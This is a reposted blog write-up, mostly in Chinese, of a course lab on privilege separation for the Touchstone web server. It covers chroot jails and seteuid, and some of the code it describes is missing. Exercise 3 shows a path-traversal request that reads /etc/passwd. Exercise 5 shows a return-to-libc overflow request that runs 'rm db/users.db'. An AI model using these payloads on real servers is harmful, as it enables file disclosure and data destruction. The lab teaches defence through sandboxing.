本文共 2351 字，大约阅读时间需要 7 分钟。

Lab Overview

In this lab, you’ll explore privilege separation. The key insight of privilege separation is to give minimal privilege to each component of a system, so that when one component of the system is comprised, other components will not be comprised too.

To make the discussion concrete, you will do this lab for the Touchstone web server, that is, you will privilege-separate the Touchstone web server by giving each component appropriate privilege. To be specific, you will first examine possible bugs in the source code of the Touchstone web server, and comprise the Touchstone web server by designing and performing exploitations. Finally, you will break up the application into privilege-separated components to minimize the effects of possible vulnerabilities.

This lab consists of three parts:Part A: you will examine the architecture of the Touchstone web server. The Touchstone web server in this lab differs dramatically from those from lab 1 and 2, the current one is based on the idea of services;Part B: you will explore jail, by which you can constraint the service in some fake root directory;Part C: you will privilege-separate the Touchstone web server by assigning each component appropriate privilege.

---

Exercise 1

如果运行touchstone出现如下情况

关闭apache即可：

$ sudo /etc/init.d/apache2 stop

---

Exercise 2

这里我们增加一个保存上次登录时间的功能。

修改init_db()函数，增加“date”字段：

在sqlhelper.c中增加函数get_date()用于获取上次登录时间：

增加函数update_data()用于更新数据库：

修改register_db()函数，使得注册的时候保存当前时间为注册时间：

在Handle_post()函数中应该修改调用为register_db(name, pwd, datetime)，同时登录时应把注册时间显示在网页上。

---

Exercise 3

观察hadleGet()函数：

要访问/etc/passwd文件，只需让uri等于passwd的相对路径即可，因此只需把请求修改为

char *req ="GET /../../../../../etc/passwd HTTP/1.1\r\n\r\n";

---

Exercise 4

在server.c的main()函数中调用chroot()函数即可：

chroot("/jail");

---

Exercise 5

这里和Lab 2类似，不做过多阐述：

int main(){    ...    char *shellcode = "rm db/users.db";    char req[1080];    int i = 0;    memset(req,'a',strlen(req));    for(;i < strlen(shellcode);i ++)      req[i] = shellcode[i];    req[i] = '\0';    req[2] = 9;    *((int *)&req[1064]) = 0xb7fcee10;    //system    *((int *)&req[1072]) = 0xbfffeeb4;    //&s    req[1076] = '\r';    req[1077] = '\n';    req[1078] = '\r';    req[1079] = '\n';    ...}

---

Exercise 6

由于/jail目录所有者为root，因此只需在调用httpd前设置e_uid为普通用户（即非0）即可：

seteuid(1000);

---

Exercise 7

不能成功。攻击时服务器端会出现删除文件的提示，因为执行删除命令的httpd已经不再是以root身份运行。即使同意删除，也会因为权限而删除失败。

---

Challenge

---

转载地址：https://blog.csdn.net/Thare_Lam/article/details/49894351 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！